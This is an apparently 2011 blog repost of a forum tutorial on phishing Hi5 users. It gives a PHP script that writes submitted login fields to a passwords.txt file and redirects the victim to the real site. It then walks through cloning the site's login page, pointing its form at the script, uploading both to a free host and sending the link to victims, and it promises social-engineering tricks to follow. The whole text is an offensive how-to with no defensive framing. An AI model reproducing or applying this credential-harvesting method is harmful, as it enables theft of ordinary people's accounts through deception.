Search This Blog

Thursday, March 3, 2011

Phishing Tutorial

SOURCE and more info at: www.messblack.com


Phishing Tutorial posted by JetZone

Creating a fake login page and some social engineering trick's.
1.) First part:Creating the Fake Login Page.
In this part of the tutorial I'm going to tell you have to make a fake login page.
This method works for most of the pages but i have chosen Hi5 as an example.
Part 1:
First we create a PHP script that will save the passwords in a text file.

1.) Open notepad and put this
code:
CODE
< ?php header ('Location: http:// www.hi5.com/friend/login.do '); $handle = fopen ("passwords.txt", "a"); foreach($_POST as $variable =>
$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($ handle, "\r\n");
fclose($handle) ;
exit;
? >

2.)Now save this as phish.php
Note:
CODE
header ( 'Location: http://
www.hi5.com/friend/login.do
') ;

This URL is where the victim is redirected after logging in to you fake page.

The best way to do this is to go to the original site(in this case hi5) and try to login without username and password. Of course then the site will tell you that the username/password incorrect. Now copy that url and paste in that part of the phish.php script. As you can see the hi5 has got "http://www.hi5.com/friend/login.do"
Now we have succesfully created the script that will save the password in a text file which will be later used to see logged victim password's.

Part 2:
Now we go to http://www.hi5.com and right click View Source.
Now we need to find the place where LOGIN button in Hi5 page send the user after clicking on it.
To do that we search for something like:
CODE
action=anything.
In this case we have:
CODE
action="/friend/login. do"
We replace that part with:
CODE
action="phish.php"
We replace that part with:
CODE
action="phish.php"
Then we copy the whole source and save this file as login.php .
Now upload these 2 files ( login.php and phish.php ) to a webhost that supports PHP and you ready to go. Just give your victim the link to your Login.php file and every time they login that php script will create a file titled passwords.txt in the same directory as login.php and phish.php. Just open the password.txt and you will see the passwords.
The phishing link should be something like this:
http://something.awardspace.com/login.php
---> Send this to your victim And the txt file with the passwords like this:
http://something.awardspace.com/passwords.txt
---> View the passwords with this one.
Another example of phishing link:
http://hi5-friendrequest.awardspace.com/login.php
Don't log in on this one, Its my phishing link. But of you do that wont bother me.

The Fake Login Page proccess is over. Easy as that. But lot of members ask how to make the victim log in on it. Well that part when we deceive our victims to log in there is called Social Engieering. There are many ways you can do that but i will show you a very simple and efficient one in the next page.

Part 1
Part 2